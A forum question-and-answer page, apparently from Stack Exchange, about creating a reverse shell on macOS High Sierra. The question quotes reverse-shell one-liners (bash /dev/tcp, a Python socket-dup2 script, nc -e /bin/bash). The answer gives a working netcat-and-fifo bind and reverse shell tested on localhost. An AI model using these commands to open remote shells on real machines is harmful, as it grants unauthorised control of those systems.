Create reverse shell using High Sierra?

macos terminal high-sierra

I'm trying to create a reverse shell listener using High Sierra but nothing seems to work.

The bash command kinda just hangs in the terminal and times out. 

bash -i >& /dev/tcp/0.0.0.0/8080 0>&1

The python command errors with "Connection refused" when using python or python v2.7.

python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",8080));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

the netcat command errors with "nc: invalid option -e"

nc -e /bin/bash 0.0.0.0 8080

I've tried other solutions I've found online but you get the idea...

Is it possible to create a reverse shell (preferably with access to bash) using High Sierra?

specifications:

sh-3.2# system_profiler SPSoftwareDataType 
Software:

    System Software Overview:

      System Version: macOS 10.13.4 (17E199)
      Kernel Version: Darwin 17.5.0
      Boot Volume: lily
      Boot Mode: Normal
      Computer Name: lily’s MacBook Air
      User Name: System Administrator (root)
      Secure Virtual Memory: Enabled
      System Integrity Protection: Enabled
      Time since boot: 2:03

Solution 1:

If I understand correctly, you want to connect to your High Sierra machine from an external source via something like netcat (nc), send commands to bash, and view the response.

There are more secure and simpler ways to do this using ssh, but presuming this is some kind of experiment or development trick, here's how you can do what you're asking.

My answer is based on an answer I found elsewhere on SE (https://superuser.com/a/607855), which itself is based on other SO/SE answers.

First make a fifo:

mkfifo myfifo

Then start 'nc' using the fifo as its input, piping its output to bash, and redirecting bash's output to the fifo:

nc -l 127.0.0.1 8080 < myfifo | /bin/bash -i > myfifo 2>&1

(The '-i' flag for bash indicates an interactive shell, and may not be desirable for this use case.)

From the remote device (in my testing, myself):

nc 127.0.0.1 8080

If you want to reverse the roles, i.e. the High Sierra machine is establishing the connection to the remote device, and giving the remote device access to bash on the HS host, you would move the listen flag (-l). So, the remote device would start netcat first in listen mode:

nc -l 127.0.0.1 8080

Then the High Sierra host would connect to the remote device:

nc 127.0.0.1 8080 < myfifo | /bin/bash -i > myfifo 2>&1

Related

Can I view hidden files and directories from the Open or Save As dialog boxes without making them visible in the Finder? [duplicate]
How to create a slowing scroll effect on a scrollbox?
Async ShowDialog
What is the replacement for ActionController::Base.relative_url_root?
Equivalent code of CreateObject in C#
CryptoJS AES encryption and Java AES decryption
Save state of activity when orientation changes android
Change CSS element with JQuery when scroll reaches an anchor point
get the last picture taken by user
Access network share from within VBScript eg FileSystemObject
Nginx config file overwritten during Elastic Beanstalk deployment?
Find out the running process ID by package name